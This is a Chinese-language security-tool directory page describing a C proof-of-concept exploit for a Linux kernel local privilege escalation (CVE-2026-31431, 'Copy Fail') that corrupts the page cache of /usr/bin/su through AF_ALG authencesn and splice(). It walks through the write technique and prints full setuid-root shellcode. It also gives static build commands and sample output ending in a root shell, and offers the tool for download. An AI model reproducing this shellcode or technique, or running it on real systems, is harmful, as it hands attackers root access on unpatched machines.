Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
copyfail — CVE-2026-31431(复制失败)PoC - 通过 authencesn AF_ALG + splice() 导致的 Linux 内核页缓存损坏 | Kitploit
工具/GitHubGitHub/smarttfoxx/copyfail
权限提升漏洞利用框架漏洞分析漏洞利用Payload 开发二进制利用
GitHubsmarttfoxx/copyfail

copyfail

CVE-2026-31431(复制失败)PoC - 通过 authencesn AF_ALG + splice() 导致的 Linux 内核页缓存损坏

查看仓库
20744个月前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Copy Fail - CVE-2026-31431 C语言PoC

针对 CVE-2026-31431(Copy Fail)的本地权限提升漏洞利用程序,使用C语言编写。

工作原理

  1. ELF解析:通过 PT_LOAD 程序头将 /usr/bin/su 的入口点虚拟地址解析为文件偏移量
  2. AF_ALG设置:使用零密钥绑定到 authesn(hmac(sha256),cbc(aes))
  3. 4字节页缓存写入:对于shellcode负载的每个块:
    • sendmsg() 发送AAD,其中shellcode字节作为 seqno_lo(字节4-7),并带有 MSG_MORE
    • splice() 将目标文件页缓存页的32字节作为AEAD认证标签传递
    • recv() 触发解密,authesn 的临时写入落入链式页缓存页中,写入4个受控字节。
  4. 权限提升:execl("/usr/bin/su") 加载被篡改的页缓存。40字节的shellcode(setuid(0) + execve("/bin/sh"))以setuid-root权限运行

Shellcode

root@kitploit:~
xor    edi, edi            ; uid = 0
mov    eax, 105            ; sys_setuid
syscall
xor    edx, edx            ; envp = NULL
push   rdx                 ; null terminator
movabs rax, "/bin/sh"      ; "/bin/sh\0"
push   rax
mov    rdi, rsp            ; filename
push   rdx                 ; NULL (argv[1])
push   rdi                 ; argv[0]
mov    rsi, rsp            ; argv
mov    eax, 59             ; sys_execve
syscall

构建

需要 musl-gcc 或任何支持静态链接的C编译器:

root@kitploit:~
musl-gcc -static -O2 -s -o copyfail exploit.c

或者使用GCC + glibc:

root@kitploit:~
gcc -static -O2 -s -o copyfail exploit.c

使用方法

root@kitploit:~
$ ./copyfail
[*] CVE-2026-31431 PoC (Copy Fail)
[*] /usr/bin/su entry @ file offset 0x78
[*] Patching page cache (40 bytes, 10 writes)
..........
[+] Executing /usr/bin/su
# id
uid=0(root) gid=1000(user) groups=1000(user)

参考

  • Copy Fail: 732 Bytes to Root on Every Major Linux Distribution
  • 修复提交 a664bf3d
  • 引入于提交 72548b093ee3(2017年)

免责声明

此概念验证仅供授权的安全研究和教育目的使用。未经授权对您不拥有或未获得明确测试许可的系统使用此工具属于违法行为。

下载工具